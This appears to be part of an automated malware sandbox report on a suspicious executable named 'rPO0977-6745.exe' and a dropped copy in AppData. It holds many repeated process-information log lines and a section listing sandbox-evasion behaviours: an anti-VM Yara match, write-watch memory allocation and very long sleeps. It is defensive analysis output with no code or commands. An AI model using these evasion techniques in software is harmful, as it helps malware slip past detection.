Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 2F10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 3190000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 2FB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 7B70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 8B70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 8E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 9E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 1440000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 2F20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Memory allocated: 2D60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: D40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: 29F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: 49F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: 7580000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: 8580000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: 7580000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: E40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Memory allocated: 4790000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599872 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599654 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599202 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598983 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598758 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598542 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598436 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 598091 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597983 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597653 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596672 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596453 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596344 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Thread delayed: delay time: 596204 Jump to behavior
